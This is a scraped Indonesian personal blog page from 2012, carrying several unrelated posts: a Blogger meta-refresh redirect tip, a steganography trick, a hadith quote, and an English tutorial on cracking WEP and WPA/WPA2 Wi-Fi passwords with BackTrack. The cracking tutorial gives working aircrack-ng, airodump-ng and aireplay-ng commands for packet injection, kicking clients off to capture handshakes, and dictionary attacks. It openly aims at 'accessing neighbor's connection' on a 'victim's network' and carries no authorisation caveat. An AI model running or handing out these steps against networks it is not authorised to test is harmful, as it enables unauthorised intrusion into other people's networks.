Slide # 1

Slide # 1

Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts Read More

Slide # 2

Slide # 2

Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts Read More

Slide # 3

Slide # 3

Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts Read More

Slide # 4

Slide # 4

Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts Read More

Slide # 5

Slide # 5

Far far away, behind the word mountains, far from the countries Vokalia and Consonantia, there live the blind texts Read More

Selasa, 07 Agustus 2012

Sore ini, saya akan mempersembahkan sebuah cara untuk meng-Redirect suatu alamat website atau biasa disebut URL (unit resource locator). Redirect ini sendiri berfungsi mengalihkan suartu alamat URL pada browser menuju ke alamat lain. ini berbeda dengan konsep istilah Link tapi hampir sama maksudnya, redirect disini yaitu misal kita mempuyai suatu website dengan alamat yang ingin dituju www.sayapengentau.com tetapi website kita ini  kita ingin isi dari konten web diahlikan pada alamat website yang lain misal www.selamat.com secara otomatis ketika kita mengetikan/membuka alamat tersebut. seperti itulah. Ngertikan maksudnya... ya udah langsung stepnya aja.

Pada blogger, pertama kita masuk ke TEMPLATE kemudian EDIT HTML, setelah itu cari tag <head> biasanya berada diawal-awal kemudian masukan tag seperti ini :

<meta content='0; url=http://www.haydunia.com' http-equiv='refresh'/>

setelah itu jangan lupa di SAVE

image

pada gambar tersebut url yang di stabilo itu merupakan redirect Linknya.... dalam arti ketika anda mengetikan alamat blog anda maka secara otomatis akan menuju ke alamat url yang berbeda.

 

sekian, mudah-mudahan bermafaat bagi kalian semua. :)

jika masih bingung tinggalkan komment saja !!

Senin, 06 Agustus 2012

Wireless Hacking Using

Backtrack

Introduction

Hello and welcome to my tutorial about wireless networking.

Today I’ll be teaching you how easy it is to obtain access to a wireless protected network by cracking the Wi-Fi network’s password.

There are lots of questions coming from the beginners on how to get  WEP/WPA/WPA2   password and accessing neighbor’s connection.

I will be covering all of the aspects and ways of hacking a network and gaining access to the router.

==>>How to Crack WEP password

What You need to succeed-

clip_image001

· A compatible wireless adapter—This is the biggest requirement. You’ll need a wireless adapter that’s capable of packet injection, and chances are the one in your computer is not.

· A BACKTRACK CD-Download yourself a copy of the CD and burn it, or load it up in VMware to get started.

· A nearby WEP-enabled Wi-Fi network. The signal should be strong and ideally people are using it, connecting and disconnecting their devices from it.

Okay so let’s begin, so first we need to open a terminal. To do that, just click the little icon that’s on the right side from System. Please see the image below:

 

STEP 1:

Type the command-    airmon-ng

This  command displays our interfaces.In my case I have wlan0, and now we are going to put it into monitor mode.

STEP 2:

Type-  airmon-ng start wlan0.

As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

clip_image003

STEP 3:

Type airodump-ng mon0 and that will start scanning for Wi-Fi networks. As you can see, there is a network called SKIDHACKER. Take a note of the BSSID the DATA, the CHANNEL and the type of ENCRYPTION. Please refer to the image below, if you have any trouble getting to that point.

clip_image004

STEP 4:

Now we are going to set it to lock on a specific network named SKIDHACKER. To do that, type airodump-ng -c (channel) -w WEPcrack –bssid (bssid of the network) mon0. Replace (channel) with the channel of the victim’s network, and replace (bssid of the network) with the bssid of the victim’s network.

clip_image005

Okay so as you can probably see the data is going really slow, and we need to boost that up. We are going to need a lot more data, so let’s preform one of the aireplay commands that will boost that data.

STEP 5:

Firstly, open up a new terminal and type aireplay-ng -1 0 -a (bsisd) mon0 where(bssid) is the bssid of the network. Now if your Wi-Fi card is supported, you should see Association successful clip_image006 , if you don’t see that then your card is not supported.

clip_image007

Step 6:

Now we are going to type in aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0. And now when the question Use this packet ? pops up, just push the letter y. And now as you can see in the image below, the data went high drastically.

clip_image008

STEP 7:

Okay so now lets open a new terminal and we are going to attempt to crack it with the amount of data we have. I recommend getting over 20000 data before trying. So let’s type aircrack-ng WEPcrack*.cap. Replace WEPcrack with the filename you chose before when capturing the data, and don’t forget to add that asterisk after the file and the extension which is .cap.

clip_image009

STEP 8:

And now it will attempt to get the password. Just wait a couple of minutes for it to complete, and once it did it will say KEY FOUND! [ XX:XX:XX:XX:XX ] where the X’s will be random numbers and/or letters. That’s not it, now to connect you will need to remove the semicolumns. For an example, if we were to have 12:34:52:66:59, the password would be 1232526659.

Just log in to your Windows OS, and connect using that password.

==========================================

==========================================

==>>How to Crack WPA/WPA2 Passowrd

clip_image010

So lets begin. What you will need for this crack is a dictionary file that we are going to use to get  the WPA/WPA2 password.

Remember, the bigger the dictionary file is the greater the chance you have in cracking the password.

So now you are probably wondering, where do I get a dictionary file? Well, I don’t know if this is allowed or not but I recently downloaded a 1.9GB dictionary file.You can google for it.

STEP 1:

Okay, so firstly open up a terminal and once we have the terminal open we are going to type in airmon-ng which will display our wireless interfaces.

In my case I have wlan0, and now we are going to put it into monitor mode.

clip_image003[1]

STEP 2:

Type airmon-ng start wlan0. As you can see on the picture below it says (monitor mode enabled on mon0), and we are going to be using mon0 instead of wlan0 as our interface.

STEP 3:

Lets type in airodump-ng mon0 and this command is going to initiate the scanning process for wifi networks. As you can see in the picture below, a few WPA encrypted networks should pop up. I’m going to attempt to crack the network under thebssidSKIDH?CKER. Take a note of the channel, and you want to copy the BSSID for later use.

clip_image011

STEP 4:

Now type  airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0, and replace the values to fit what you got from the last step. Don’t forget to remember what filename you chose, because we are going to need that at the end.

clip_image012
What is needed to get the WPA or WPA2 key is something called a WPA Handshake. You can obtain a handshake by kicking someone off the network, and those computers will automatically reconnect which will give you the handshake.

This means, if there is no one on the network, you can’t get a handshake, and you can’t crack the WPA network.

STEP 5:

So how do we know if someone is connected?Well look at the lower part of the airodump command, and you will notice something as STATION, and underneath that if someone is connected it wil show you their mac address.

clip_image013

Once you get a handshake, airodump will alert you in the top screen, and the handshake will be located right from the time stamp.

STEP 6:

Okay, so lets open up a new terminal and we are going to kick off the computers connected. Lets type in aireplay-ng -1 0 -a (bssid) mon0. replace bssid with the network you are trying to crack and hit enter. It is going to attempt to kick off a client, and if it succeeds you will see the wpa handshake at the top right corner, if you don’t run the aireplay command a couple of times.

clip_image014

So now that we have a wpa handshake file, we are going to attempt to crack it.

STEP 7:

Lets stop the scan by pressing CONTROL + C on the terminal where airodump is running. Now in order to find the handshake file, you need to go in the top menu and chose Places > Home Folder. Okay, so lets open up a terminal and we are going to type in aircrack-ng -w (dictionary) /root/(filename). Where filename is the filename you specified when capturing the wpa handshake and the dictionary is the path of the wordlist you downloaded.

STEP 8:

This can be done by dragging in the handshake file into the terminal after the aircrack-ng -w (dictionary) command and it will parse in it’s directory. All you need to do is hit enter. The password needs to be in the dictionary file, so the bigger the wordlist is the bigger are the chances of you getting the password.

clip_image015
If the password is in the wordlist, it will give you a success message and the key in brackets.

Happy hacking..!

clip_image016

=>> airmon-ng
This command displays the wireless interfaces.

=>> airmon-ng start wlan0
This command starts monitoring mode on a wi-fi device.

=>> airodump-ng mon0
This command shows all of the wi-fi networks online.

=>> airodump-ng -c (channel) -w (filename) –bssid (bssid) mon0
This command specifies the wi-fi device to concentrate to one network.

=>> aireplay-ng -1 0 -a (bssid) mon0
This command kicks off clients that are connected, and gets the handshake.

=>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
This command boosts the data, when cracking WEP.

=>> aircrack-ng -w (dictionary) (wpa handshake)
This command is used when cracking WPA or WPA2 networks.

=>> aircrack-ng (filename)*.cap
This command is used when cracking WEP networks.

Now you must got an experience with the WEP cracking using BackTrack? What do you have to say about it? Give it up in the comments.

Minggu, 05 Agustus 2012

Hay, broo/sis
Today, saya mau ngeShare sebuah trick yang biasa disebut "steganografi" atau ilmu menyembuyikan pesan yang tak terlihat padahal terlhat dengan jelas. ok, tanpa banyak ngedongeng. saya akan menjelaskannya step-by-step.
pertama yang mesti dilakukan yaitu ambil sebuah gambar apa aja yang bakalan akan disisipin "pesan rahasia". misal  = xxx.jpg tarohnya didestop aja biar gampang.
image
tampak terlihat pada gambar di atas terdapat file bernama xxx.jpg pada desktop
setelah itu buat file notepad berisikan "pesan rahasia anda", simpan di notepad lagi biar gampang nemunya !
image
klo sudah perhatikan gambar dibawah ini :.
image
iIni berarti file secret.txt yang berisikan pesan anda telah di inputkan secara rahasia kedalam kode binner,  Jika anda ingin mengetahui isi pesan rahasia anda pada file xxx.jpg tadi anda tinggal menOpen withkan dengan notepad saja :
image
file xxx.jpg otomatis menyimpan file secrect.txt tadi kedalam file xxx.secrect.jpg
Trick ini bisa dikombinasikan dengan berbagai file misal pada winRar atau file yang lainnya (dicoba aja sendiri).
Ok, semoga berhasil !! :D

Jumat, 03 Agustus 2012

Dengan hadists dari Jabir r.a., ia berkata, "Aku mendengar Rasullah SAW. bersabda, "Sesungguhnya pada malam hari itu benar-benar ada saat yang seorang muslim dapat menepatinya untuk memohon kepada Allah suatu kebaikan dunia dan akhirat pasti Allah akan memberikannya (mengabulkannya) dari itu setiap malam. "(H.R. Muslim dan Ahmad)